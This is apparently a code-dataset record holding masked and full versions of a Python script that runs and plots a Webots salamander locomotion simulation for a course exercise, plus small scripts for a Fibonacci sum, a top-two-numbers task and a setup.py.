plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import time
import numpy as np
import matplotlib.pyplot as plt
from plot_results import plot_2d
from run_simulation import run_simulation
from simulation_parameters import SimulationParameters
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
"""Exercise 9c"""
import time
import numpy as np
import matplotlib.pyplot as plt
from plot_results import plot_2d
from run_simulation import run_simulation
from simulation_parameters import SimulationParameters
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [
SimulationParameters(
simulation_duration=15,
drive=4.0,
amplitudes=None,
phase_lag=None,
turn=None,
amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],
backward = None,
frequency = 1,
# ...
)
#for Rhead in np.linspace(0.2,0.5,10)
#for Rtail in np.linspace(0.5,0.2,10)
# for amplitudes in ...
# for ...
]
# Grid search
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(
world,
parameters,
timestep,
int(1000*parameters.simulation_duration/timestep),
logs="./logs/9c/simulation_{}.npz".format(simulation_i)
)
plot_9c(parameter_set)
def main():
n_joints = 10
#Rhead = 0.44
#Rtail = 0.27
parameter_set = [
SimulationParameters(
simulation_duration=15,
drive=4.0,
amplitudes=None,
phase_lag=None,
turn=None,
amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],
backward = None,
frequency = 1,
# ...
)
for Rhead in np.linspace(0.2,0.5,10)
for Rtail in np.linspace(0.5,0.2,10)
# for amplitudes in ...
# for ...
]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set),3])
results_en = np.zeros([len(parameter_set),3])
ratio_vel_en = np.zeros([len(parameter_set),3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
#path = os.path.dirname(__file__)
path = 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
print(path)
for i in range(len(parameter_set)):
with np.load(path+'/logs/9c/simulation_'+str(i)+'.npz',allow_pickle=True) as data:
#? initialisation for the computation
position = data["links"][:, 0, :]
n_steps = len(position)
timestep = float(data["timestep"])
results_vel[i][0] = data["amplitude_gradient"][0]
results_vel[i][1] = data["amplitude_gradient"][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
#! Velocity
begin_step = (int)(4/timestep)
vel = (position[n_steps-1,:] - position[begin_step,:])**2
results_vel[i][2] = np.sqrt(np.sum(vel))/((n_steps-begin_step)*timestep)
#! Energy
joint_vel = data["joints"][begin_step:,:,1]
joint_tor = data["joints"][begin_step:,:,3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy,1)))
#! Ratio
ratio_vel_en[i][2] = results_vel[i][2]/results_en[i][2]
print ('Time elapsed for the velocity plot' + str(time.time()-t))
plt.figure("Velocity")
plot_2d(results_vel,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Velocity [m/s]'])
plt.figure("Energy")
plot_2d(results_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', '$log_{10}(Energy)$[J]'])
plt.figure("Ratio")
plot_2d(ratio_vel_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Ratio V/E $[s\cdot kg^{-1}\cdot m^{-1}]$'])
t = time.time()
plt.show()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "a0284eba1a0e6c498f240068c586e7f8b79cd86c",
"index": 5782,
"step-1": "<mask token>\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot 
kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel 
* joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel 
* joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plot_results import plot_2d\nfrom run_simulation import run_simulation\nfrom simulation_parameters import SimulationParameters\n\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n n_joints = 10\n Rhead = 0.44\n Rtail = 0.23\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1)]\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(world, parameters, timestep, int(1000 * parameters.\n simulation_duration / timestep), logs=\n './logs/9c/simulation_{}.npz'.format(simulation_i))\n plot_9c(parameter_set)\n\n\ndef main():\n n_joints = 10\n parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,\n amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[\n Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace\n (0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]\n plot_9c(parameter_set)\n\n\ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set), 3])\n results_en = np.zeros([len(parameter_set), 3])\n ratio_vel_en = np.zeros([len(parameter_set), 3])\n sal_pos_t = []\n sal_pos_t_bad = []\n t = time.time()\n path = (\n 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n )\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',\n allow_pickle=True) as data:\n position = data['links'][:, 0, :]\n n_steps = len(position)\n timestep = float(data['timestep'])\n results_vel[i][0] = data['amplitude_gradient'][0]\n results_vel[i][1] = data['amplitude_gradient'][1]\n results_en[i][:2] = results_vel[i][:2]\n ratio_vel_en[i][:2] = results_vel[i][:2]\n begin_step = int(4 / timestep)\n vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 
2\n results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -\n begin_step) * timestep)\n joint_vel = data['joints'][begin_step:, :, 1]\n joint_tor = data['joints'][begin_step:, :, 3]\n energy = joint_vel * joint_tor\n results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))\n ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]\n print('Time elapsed for the velocity plot' + str(time.time() - t))\n plt.figure('Velocity')\n plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Velocity [m/s]'])\n plt.figure('Energy')\n plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n '$log_{10}(Energy)$[J]'])\n plt.figure('Ratio')\n plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',\n 'Ratio V/E $[s\\\\cdot kg^{-1}\\\\cdot m^{-1}]$'])\n t = time.time()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"Exercise 9c\"\"\"\n\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plot_results import plot_2d\nfrom run_simulation import run_simulation\nfrom simulation_parameters import SimulationParameters\n\ndef exercise_9c(world, timestep, reset):\n \"\"\"Exercise 9c\"\"\"\n\n n_joints = 10\n \n Rhead = 0.44\n Rtail = 0.23\n\n\n parameter_set = [\n SimulationParameters(\n simulation_duration=15,\n drive=4.0,\n amplitudes=None,\n phase_lag=None,\n turn=None,\n amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],\n backward = None,\n frequency = 1,\n # ...\n )\n \n #for Rhead in np.linspace(0.2,0.5,10)\n #for Rtail in np.linspace(0.5,0.2,10)\n # for amplitudes in ...\n # for ...\n ]\n\n \n # Grid search\n for simulation_i, parameters in enumerate(parameter_set):\n reset.reset()\n run_simulation(\n world,\n parameters,\n timestep,\n int(1000*parameters.simulation_duration/timestep),\n logs=\"./logs/9c/simulation_{}.npz\".format(simulation_i)\n )\n\n \n\n plot_9c(parameter_set)\n \n\n \n\ndef main():\n\n\n n_joints = 10\n\n #Rhead = 0.44\n #Rtail = 0.27 \n \n parameter_set = [\n SimulationParameters(\n simulation_duration=15,\n drive=4.0,\n amplitudes=None,\n phase_lag=None,\n turn=None,\n amplitude_gradient=[Rhead, Rtail], #[4.0,2.0],\n backward = None,\n frequency = 1,\n # ...\n )\n \n for Rhead in np.linspace(0.2,0.5,10)\n for Rtail in np.linspace(0.5,0.2,10)\n # for amplitudes in ...\n # for ...\n ]\n\n plot_9c(parameter_set)\n\n \ndef plot_9c(parameter_set):\n results_vel = np.zeros([len(parameter_set),3])\n results_en = np.zeros([len(parameter_set),3])\n ratio_vel_en = np.zeros([len(parameter_set),3])\n \n \n sal_pos_t = []\n sal_pos_t_bad = []\n\n \n t = time.time()\n\n #path = os.path.dirname(__file__)\n path = 'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'\n print(path)\n for i in range(len(parameter_set)):\n with np.load(path+'/logs/9c/simulation_'+str(i)+'.npz',allow_pickle=True) as data:\n 
\n #? initialisation for the computation\n position = data[\"links\"][:, 0, :]\n n_steps = len(position)\n \n timestep = float(data[\"timestep\"])\n\n results_vel[i][0] = data[\"amplitude_gradient\"][0]\n results_vel[i][1] = data[\"amplitude_gradient\"][1] \n\n results_en[i][:2] = results_vel[i][:2] \n ratio_vel_en[i][:2] = results_vel[i][:2]\n\n \n\n #! Velocity\n\n begin_step = (int)(4/timestep)\n\n vel = (position[n_steps-1,:] - position[begin_step,:])**2\n results_vel[i][2] = np.sqrt(np.sum(vel))/((n_steps-begin_step)*timestep)\n\n #! Energy\n\n joint_vel = data[\"joints\"][begin_step:,:,1]\n joint_tor = data[\"joints\"][begin_step:,:,3]\n\n energy = joint_vel * joint_tor\n \n results_en[i][2] = np.log10(np.mean(np.sum(energy,1)))\n \n #! Ratio \n\n ratio_vel_en[i][2] = results_vel[i][2]/results_en[i][2]\n \n \n print ('Time elapsed for the velocity plot' + str(time.time()-t))\n\n\n\n plt.figure(\"Velocity\")\n plot_2d(results_vel,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Velocity [m/s]'])\n plt.figure(\"Energy\")\n plot_2d(results_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', '$log_{10}(Energy)$[J]'])\n plt.figure(\"Ratio\")\n plot_2d(ratio_vel_en,['Amplitude Head [rad]', 'Amplitude Tail [rad]', 'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])\n \n t = time.time()\n \n plt.show() \n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(n):
inp = int(input())
lista.append(inp)
lista.sort(reverse=True)
print(lista[0])
print(lista[1])
<|reserved_special_token_1|>
n = int(input())
lista = []
for i in range(n):
inp = int(input())
lista.append(inp)
lista.sort(reverse=True)
print(lista[0])
print(lista[1])
|
flexible
|
{
"blob_id": "b03960999fa30a55932ada7fbf731a3861b840ae",
"index": 3496,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n",
"step-3": "n = int(input())\nlista = []\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
if fib[counter] > 4000000:
flag = 0
break
else:
fib.append(fib[counter] + fib[counter - 1])
counter += 1
<|reserved_special_token_0|>
print(total)
<|reserved_special_token_1|>
fib = [1, 2]
counter = 1
while True:
if fib[counter] > 4000000:
flag = 0
break
else:
fib.append(fib[counter] + fib[counter - 1])
counter += 1
fib = fib[0:len(fib) - 1]
total = sum(fib)
print(total)
<|reserved_special_token_1|>
# coding: utf-8
# In[50]:
## Description
## Adds the Fibonacci numbers smaller than 4 million
## Weekly Journal
## When using while True, "break" MUST be used to avoid infinite loops
## Questions
## None
fib=[1,2]
counter=1
while True:
if fib[counter]>4000000:
flag=0
break
else:
fib.append(fib[counter]+fib[counter-1])
counter+=1
fib=fib[0:len(fib)-1]
total=sum(fib)
print(total)
|
flexible
|
{
"blob_id": "e2572b48f7183353ba2aab0500130dc8a71a0b22",
"index": 5286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\n<mask token>\nprint(total)\n",
"step-3": "fib = [1, 2]\ncounter = 1\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\nfib = fib[0:len(fib) - 1]\ntotal = sum(fib)\nprint(total)\n",
"step-4": "\n# coding: utf-8\n\n# In[50]:\n\n\n## Description\n## Adds the Fibonacci numbers smaller than 4 million\n\n## Weekly Journal\n## When using while True, \"break\" MUST be used to avoid infinite loops\n\n## Questions\n## None\n\nfib=[1,2]\ncounter=1\nwhile True:\n if fib[counter]>4000000:\n flag=0\n break\n else:\n fib.append(fib[counter]+fib[counter-1])\n counter+=1\nfib=fib[0:len(fib)-1]\ntotal=sum(fib)\nprint(total)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='testcov-plugin', version='1.0', packages=['testcov'],
namespace_packages=['testcov'], entry_points={'plugins': [
'testp = testcov.plugin:testp']}, description='Test for coverage bug')
<|reserved_special_token_1|>
import io
import os
from setuptools import setup
setup(name='testcov-plugin', version='1.0', packages=['testcov'],
namespace_packages=['testcov'], entry_points={'plugins': [
'testp = testcov.plugin:testp']}, description='Test for coverage bug')
<|reserved_special_token_1|>
import io
import os
from setuptools import setup
setup(name='testcov-plugin',
version='1.0',
packages=['testcov'],
namespace_packages=['testcov'],
entry_points={
'plugins': ['testp = testcov.plugin:testp'],
},
description="Test for coverage bug")
|
flexible
|
{
